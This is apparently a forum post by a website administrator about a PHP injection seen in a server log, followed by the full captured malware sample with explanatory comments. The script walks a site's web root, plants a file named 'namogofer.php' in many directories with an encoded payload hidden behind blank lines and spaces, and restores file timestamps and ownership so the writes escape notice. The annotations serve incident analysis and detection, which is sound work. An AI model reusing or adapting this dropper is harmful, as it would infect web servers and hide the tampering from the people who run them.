[client 196.28.230.50] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://www.elettrodataservice.it/foto_a ... aca/a/.php on line 101\n
What this seems to do is hit the website and then execute the script at this address. I have manually denied everything from this IP, but it appears to spread through other sites. The code available at this link is below.
// Captured sample, reproduced verbatim for analysis.
// Level 1 is E_ERROR only, so warnings and notices raised by this script are not reported.
error_reporting(1);
// Legacy long server-variable array; $_SERVER is not used anywhere in this sample.
global $HTTP_SERVER_VARS;
// Start timestamp; walkdir() measures elapsed seconds against it.
$START = time();
// Time budget in seconds, indexed by recursion depth (walkdir() reads $WD_TIMEOUT[$l]).
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
// Writes $data to $f (truncating it), then restores the timestamps the file and
// its parent directory had before the write. Returns $f on success and '' when
// the file could not be opened. Every call is @-silenced, so failures raise no
// PHP warnings.
// Detection note: because mtime/atime are put back, "recently modified" sweeps
// will not surface these writes; compare content hashes or inode change time.
function my_fwrite($f,$data) {
global $CURFILE;
// Snapshot the pre-write timestamps of the target and of its directory.
$file_mtime = @filemtime($f);
$file_atime = @fileatime($f);
$dir_mtime = @filemtime(@dirname($f));
$dir_atime = @fileatime(@dirname($f));
if ($file_h = @fopen($f,"wb")){
@fwrite($file_h,$data);
@fclose($file_h);
if ($file_mtime){
// Target had a modification time before the write: put its old times back.
@touch($f,$file_mtime,$file_atime);
}elseif(@filemtime($CURFILE)){
// No prior mtime for the target: copy mode, times, group and owner from the
// running script ($CURFILE) so the new file carries the same metadata.
@chmod($f,@fileperms($CURFILE));
@touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
@chgrp($f,@filegroup($CURFILE));
@chown($f,@fileowner($CURFILE));
};
// Restore the directory's times, which creating or rewriting the file changed.
if ($dir_mtime)
@touch(@dirname($f),$dir_mtime,$dir_atime);
return $f;
}else{
return '';
};
};
// Returns the part of $f after its last "." (the file extension, without the dot).
function ext($f){
return substr($f, strrpos($f, ".") + 1);
};
// Recursive directory walk driven by optional callbacks whose names are built
// from $func: {$func}_s (on entering a directory), {$func}_d (per subdirectory),
// {$func}_f (per file) and {$func}_e (after the directory is closed).
// $p is used as a prefix ("$p$f"), so it must end in "/". $l is the recursion
// depth and selects the time budget from $WD_TIMEOUT.
// Returns 1 when the _s callback returns a truthy value; otherwise returns nothing.
function walkdir($p,$func='_walkdir',$l=0){
global $START;
global $WD_TIMEOUT;
// $FL is declared global here but not referenced in this function.
global $FL;
$func_f = "{$func}_f";
$func_d = "{$func}_d";
$func_s = "{$func}_s";
$func_e = "{$func}_e";
if ($dh = @opendir("$p")){
if (function_exists($func_s)) {
// A truthy result from the start callback skips this directory entirely.
if ($func_s($p,$l))
return 1;
};
while ($f = @readdir($dh)){
// Stop reading this directory once the elapsed time reaches the budget for this depth.
if (time() - $START >= $WD_TIMEOUT[$l] )
break;
if ($f == '.' || $f == '..' )
continue;
// Descend first, then report the subdirectory to the _d callback.
if (@is_dir ("$p$f/") )
walkdir("$p$f/",$func,$l+1);
if (@is_dir ("$p$f/") && function_exists($func_d))
$func_d("$p$f/",$l);
if (@is_file("$p$f" ) && function_exists($func_f))
$func_f("$p$f" ,$l);
};
closedir($dh);
// The end callback runs after the handle is closed; in this sample it is
// _walkdir_e, which writes the dropped file into the directory.
if (function_exists($func_e))
$func_e($p,$l);
};
};
// Drops the first strlen($R) characters of $p, turning an absolute path into one
// relative to the document root. It does not check that $p actually begins with $R.
function r_cut($p){
global $R;
return substr($p,strlen($R));
};
// Prints $t followed by a newline to the HTTP response.
function say($t) {
echo "$t\n";
};
// Prints md5("testdata_$t") as a marker line. The script emits one for 'start'
// and one for 'end'; presumably the requester uses them to confirm the run
// started and completed (not verifiable from this listing).
function testdata($t) {
say(md5("testdata_$t"));
};
// Document root of the site: the walk starts here and r_cut() strips it from paths.
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
// Absolute path of the script that is currently running.
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
// The dropped file reuses the running script's extension, defaulting to 'php'.
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
// Name of the file written into each directory. Searching the web root for
// "namogofer.*" is a direct way to find the copies this sample leaves behind.
$FN = "namogofer.$fe";
// Start-of-directory callback: resets the per-directory counters in $FCNT.
// Neither argument is used. It returns nothing, so walkdir() always continues.
function _walkdir_s($d,$l) {
global $FCNT;
$FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0);
};
// Per-subdirectory callback: counts one more directory. Neither argument is used.
function _walkdir_d($d,$l) {
global $FCNT;
$FCNT['dir' ]++;
};
// Per-file callback: counts the file, and counts it again under 'simtype' when
// its extension equals ext($CURFILE).
// NOTE(review): $CURFILE is not declared global in this function, so the second
// line reads an undefined local; the comparison is against the extension of an
// empty value, not the running script's. With notices reported, PHP raises
// "Undefined variable: CURFILE" here.
function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++;
if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; };
// End-of-directory callback: writes the dropped file "$d$FN" into directory $d
// unless 7 files have already been written at this recursion depth ($C[$l]).
// On a successful write it prints the directory's counters, tab-separated, with
// the new file's path relative to the document root.
function _walkdir_e($d,$l) {
global $C,$FCNT,$FN;
if ($C[$l]<7){
// The written content is the base64-decoded payload wrapped in 100 blank lines
// and 150 spaces on each side, so the file looks empty at a glance and the
// payload sits on line 101, consistent with the "on line 101" in the logged
// notice. Scan for files that are mostly whitespace around one long line.
if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('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').str_repeat(' ',150)."\n".str_repeat("\n",100))){
$C[$l]++;
$FCNT['fn'] = r_cut("$d$FN");
say(implode("\t",$FCNT));
};
};
};
// Walk the whole document root with the default '_walkdir' callbacks, then emit
// the 'end' marker and close the <pre> block opened earlier.
walkdir("$R/");
testdata('end');
echo "</pre>";
Checking other logs, it appears to be doing a POST to root directories, e.g. /var, /usr, etc.